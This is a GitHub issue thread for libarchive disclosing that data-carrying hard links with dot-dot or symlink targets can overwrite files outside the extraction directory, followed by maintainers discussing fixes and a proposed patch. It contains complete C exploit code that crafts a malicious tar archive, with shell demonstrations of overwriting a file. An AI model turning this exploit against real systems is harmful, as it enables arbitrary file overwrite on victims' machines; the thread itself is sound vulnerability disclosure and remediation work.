Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Hard links with data can evade sandboxing restrictions #746

Closed
kientzle opened this issue Jul 21, 2016 · 8 comments
Closed

Hard links with data can evade sandboxing restrictions #746

kientzle opened this issue Jul 21, 2016 · 8 comments

Comments

@kientzle
Copy link
Contributor

This is the last of four libarchive bugs reported in Issue #743:

{Affects}

3.2.0 (FreeBSD HEAD/ports), 3.1.2 (FreeBSD non-HEAD), possibly earlier

{Description}

Recall the three classes of filesystem attacks listed earlier:

(1) absolute paths
(2) dot-dot paths
(3) extraction through symlinks

These checks are applied as usual to the pathnames of symlinks and hard links
but not to their targets, with one exception: The targets of hard links are
subjected to absolute-path checks in tar/util.c as of FreeBSD revision r270661
and upstream commit cf8e67f (it seems the revision was submitted upstream and
was rewritten in a different form as the commit -- both strip leading slashes
from the hard-link targets, though not for security reasons).

Archive entries for hard links can use dot-dot pathnames in their targets to
point at any file on the system, subject to the usual hard-linking constraints.
Alternatively, on systems that follow symlinks for link() -- which is an
implementation-defined behavior supported by FreeBSD -- a symlink can first be
extracted that uses absolute or dot-dot pathnames to point at the file, and
then the hard-link target can be the symlink, which means that filtering the
hard-link target for dot-dot paths is not sufficient to address the problem.

The ability to point hard links at outside files becomes more serious when we
consider that libarchive supports the POSIX feature of hard links with data
payloads. This allows an attacker to point a hard link at an existing target
file outside the extraction directory and use the data payload to overwrite the
file.

{Demonstration}

Exploit code is included below.

$ cd /tmp/cage
$ ls
vuln4.c
$ cc -o vuln4 vuln4.c -larchive
$ echo hello > /tmp/target
$ echo goodbye > data
$ ./vuln4 x.tar data p ../../../tmp/target
$ tar tvf x.tar
-rwxrwxrwx 0 0 0 8 Jan 1 1970 p link to ../../../tmp/target
$ tar xvf x.tar
x p
$ cat /tmp/target
goodbye

The code could be rewritten to use symlinks instead of dot-dot paths:

$ cd /tmp/cage
$ ls
vuln4 vuln4.c
$ echo hello > /tmp/target
$ echo goodbye > data
$ ln -s /tmp/target sym
$ ./vuln4 x.tar data p sym
$ tar tvf x.tar
-rwxrwxrwx 0 0 0 8 Jan 1 1970 p link to sym
$ tar xvf x.tar
x p
$ cat /tmp/target
goodbye

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

include <sys/types.h>

include <sys/stat.h>

include <archive.h>

include <archive_entry.h>

include <fcntl.h>

include <stdio.h>

include <stdlib.h>

include <unistd.h>

static void make_archive(char *, char *, char *, char *);
static void patch_archive(char *, char *);

static void
make_archive(char *archive, char *file, char *pathname, char *linkname)
{
int fd;
ssize_t len;
char buf[1024];
struct stat s;
struct archive *a;
struct archive_entry *ae;

a = archive_write_new();
archive_write_set_format_pax(a);
archive_write_open_filename(a, archive);

ae = archive_entry_new();
archive_entry_set_pathname(ae, pathname);
/* dummy file type -- AE_SET_HARDLINK has priority anyway */ 
archive_entry_set_filetype(ae, AE_IFREG);   
stat(file, &s);
archive_entry_set_size(ae, s.st_size);
archive_entry_set_uid(ae, 0);
archive_entry_set_gid(ae, 0);
archive_entry_set_perm(ae, 0777);

/* 
 * libarchive allows _extraction_ of hardlink payloads, as per the POSIX 
 * specs for pax, but not without some arm-twisting. We set ctime to force 
 * the addition of a pax extended header so that libarchive doesn't zero 
 * the size field during _extraction_. 
 *
 * libarchive disallows _creation_ of hardlink payloads for all supported 
 * tar formats (pax, ustar, gnutar, v7tar). If we set the hardlink, 
 * libarchive will zero the size field during _creation_, so we simply 
 * create a regular-file entry and patch the archive on disk via 
 * patch_archive() when done.
 */

archive_entry_set_ctime(ae, 1, 1); 
/* archive_entry_set_hardlink(ae, linkname); */        

archive_write_header(a, ae); 

fd = open(file, O_RDONLY);
while ((len = read(fd, buf, sizeof buf)) > 0)
    archive_write_data(a, buf, (size_t)len); 

close(fd);
archive_entry_free(ae);
archive_write_close(a);
archive_write_free(a);

patch_archive(archive, linkname);

}

static void
patch_archive(char archive, char *linkname)
{
/
extended header + extended body + checksum offset */
static const long patch_offset = (512 + 512 + 148);

FILE *fp;
unsigned char *cp;
unsigned long checksum;

fp = fopen(archive, "r+b");
fseek(fp, patch_offset, SEEK_SET);
fscanf(fp, "%lo", &checksum);

/* entry type 0x30 -> 0x31 */
checksum += 1;
cp = (unsigned char *)linkname;
/* linkname char 0x00 -> 0x## */ 
while (*cp) checksum += *cp++; 

fseek(fp, patch_offset, SEEK_SET);
fprintf(fp, "%.6lo%c 1%s", checksum, '\0', linkname);

fclose(fp);

}

int
main(int argc, char *argv[])
{
if (argc != 5) {
fprintf(stderr, "Usage: %s archive file pathname linkname\n", argv[0]);
fprintf(stderr, "\tarchive output malicious archive here\n");
fprintf(stderr, "\tfile file containing overwrite data\n");
fprintf(stderr, "\tpathname archive-entry pathname\n");
fprintf(stderr, "\tlinkname archive-entry linkname\n");
fprintf(stderr, "\t [can use ../ in linkname]\n");
return EXIT_FAILURE;
}

make_archive(argv[1], argv[2], argv[3], argv[4]);

return 0;

}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

{Defense}

POSIX requires that hard links point at only extracted items, though the
possibility that a hard link can use a previously extracted symlink as a target
and escape the extraction directory should be borne in mind.

It seems a good idea to excise the data-payload functionality, which is not a
mandatory POSIX feature and which does not seem to be widely supported anyway.
Look for the lines beginning

} else if (r == 0 && a->filesize > 0) {

in create_filesystem_object() in libarchive/archive_write_disk_posix.c.

@jsonn
Copy link
Contributor

jsonn commented Jul 21, 2016

On Wed, Jul 20, 2016 at 08:42:35PM -0700, Tim Kientzle wrote:

It seems a good idea to excise the data-payload functionality, which is not a
mandatory POSIX feature and which does not seem to be widely supported anyway.
Look for the lines beginning

} else if (r == 0 && a->filesize > 0) {

in create_filesystem_object() in libarchive/archive_write_disk_posix.c.

I wonder if we can remember newly creates zero-sized hardlinks for newc.
That would be the proper solution.

Joerg

@kientzle
Copy link
Contributor Author

@jsonn: That's an interesting idea: Basically, archive_write_disk would keep a list of filenames of zero-sized regular files it's restored and reject any data-carrying hard link that wasn't on that list? That seems like a reasonable restriction to put in place in any case.

For pax, POSIX allows the first reference to be stored as a zero-length file, then subsequent references are stored as hardlink entries, with the last one carrying the data. (The convention for ustar is for the initial file entry to carry the data and the hardlink entries are all zero-length.)

For newc, all references are stored in the archive as regular files with the same inode number with the last one carrying the data. The newc reader keeps a dictionary of inode numbers it has already seen and converts the entries so the restore logic sees the same sequence as pax would generate (zero-length regular file followed by zero-length hard links and one non-zero-length hardlink).

If we were careful to remove the name as soon as we saw a data-carrying hardlink, then your suggestion would ensure that we never had more than one data-carrying hardlink with a particular name and it always overwrote a preceding zero-length file. I think zero-length hard links can just be handled as previously.

So I think your proposal would work correctly for ustar, pax, and newc. I'd have to check old cpio, but I think it also works correctly there. Most other formats don't support hard links at all. Zip is the only one that I think might be an issue (because Zip archives are not technically streams, so extraction order isn't defined in the same way that tar, cpio, etc are), but hard links in Zip are pretty rare, so I'm willing to defer that particular question for now.

The only risk I see is that this means data-carrying hard links can only be correctly restored if you keep a single archive_write_disk handle across the entire extraction. Anyone who is currently creating a new archive_write_disk handle for each separate file would get surprised. But I'm okay with that.

@jsonn
Copy link
Contributor

jsonn commented Jul 21, 2016

We can easily provide an option similar to what tar -p uses to disable such logic. As such I don't foresee a problem for splitting extraction.

@kientzle
Copy link
Contributor Author

kientzle commented Aug 7, 2016

I think it would also suffice to be more careful about hardlink targets:

  1. Reject hard links with '..' in the target
  2. Reject hard links whose target traverses a symlink

The first of these should be trivial. The second is trickier.

@rurban
Copy link

rurban commented Aug 8, 2016

See also the temp. fix in HardenedBSD/hardenedBSD@6a6ac73

@pkubaj
Copy link

pkubaj commented Sep 6, 2016

Please check whether this patch is appriopriate.

It adds the new option ('i' as in insecure) to support extracting hardlinks, when set by user.

The patch is relative to HardenedBSD source code.

diff --git a/contrib/libarchive/libarchive/archive.h b/contrib/libarchive/libarchive/archive.h
index 013eee8..aee5acc 100644
--- a/contrib/libarchive/libarchive/archive.h
+++ b/contrib/libarchive/libarchive/archive.h
@@ -1173,6 +1173,9 @@ __LA_DECL int archive_match_include_gname_w(struct archive *,
 /* Convenience function to sort a NULL terminated list of strings */
 __LA_DECL int archive_utility_string_sort(char **);

+/* Set option to support extracting hardlinks (insecure) */
+#define        INSECURE_HARDLINK_MODE  (0x40000)
+
 #ifdef __cplusplus
 }
 #endif
diff --git a/contrib/libarchive/libarchive/archive_write_disk_posix.c b/contrib/libarchive/libarchive/archive_write_disk_posix.c
index d725dff..e98fb24 100644
--- a/contrib/libarchive/libarchive/archive_write_disk_posix.c
+++ b/contrib/libarchive/libarchive/archive_write_disk_posix.c
@@ -2042,7 +2042,14 @@ create_filesystem_object(struct archive_write_disk *a)
            a->todo = 0;
            a->deferred = 0;
        } else if (r == 0 && a->filesize > 0) {
-           return (EPERM);
+           if (a->flags & INSECURE_HARDLINK_MODE) {
+               a->fd = open(a->name,
+                   O_WRONLY | O_TRUNC | O_BINARY | O_CLOEXEC);
+               __archive_ensure_cloexec_flag(a->fd);
+               if (a->fd < 0)
+                   r = errno;
+           } else
+               return (EPERM);
        }
        return (r);
 #endif
diff --git a/contrib/libarchive/tar/bsdtar.c b/contrib/libarchive/tar/bsdtar.c
index 4db3340..31a267a 100644
--- a/contrib/libarchive/tar/bsdtar.c
+++ b/contrib/libarchive/tar/bsdtar.c
@@ -359,6 +359,10 @@ main(int argc, char **argv)
             */
            bsdtar->names_from_file = bsdtar->argument;
            break;
+       case 'i': /* extracting hardlinks */
+           bsdtar->extract_flags |=
+               INSECURE_HARDLINK_MODE;
+           break;
        case OPTION_INCLUDE:
            /*
             * No one else has the @archive extension, so
diff --git a/contrib/libarchive/tar/cmdline.c b/contrib/libarchive/tar/cmdline.c
index c87741c..c5603cb 100644
--- a/contrib/libarchive/tar/cmdline.c
+++ b/contrib/libarchive/tar/cmdline.c
@@ -47,7 +47,7 @@ __FBSDID("$FreeBSD$");
  * Short options for tar.  Please keep this sorted.
  */
 static const char *short_options
-   = "aBb:C:cf:HhI:JjkLlmnOoPpqrSs:T:tUuvW:wX:xyZz";
+   = "aBb:C:cf:HhI:iJjkLlmnOoPpqrSs:T:tUuvW:wX:xyZz";

 /*

```  * Long options for tar.  Please keep this list sorted.

@kientzle
Copy link
Contributor Author

There are a bunch of complex issues at play here:

  • The newc format always puts data on hard links; the HardenedBSD change pointed out by @rurban breaks newc support.
  • The 'insecure' option suggested by @pkubaj implies that any use of hard links carrying data is necessarily insecure, which is simply not true.
  • @jsonn pointed out that the only legitimate pattern of use for a data-carrying hardlink is a zero-length file followed by zero or more zero-length hard links followed by exactly one data-carrying hardlink. (In particular, this is exactly the pattern that newc format uses.) We could easily keep a list of zero-length files and check each data-carrying hardlink against that list.
  • There are other ways to improve our hardlink extraction handling (rejecting hard links with '..' in the target, for instance) that would at least partially address this issue.

kientzle added a commit that referenced this issue Sep 12, 2016
Thanks to Doran Moppert for pointing out the inconsistencies here.
@kientzle
Copy link
Contributor Author

I believe Doran Moppert's fixes address this issue by carefully checking hard links.

I am still interested in implementing the approach outlined by @jsonn as well, but I think the current fix is good enough to close this.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants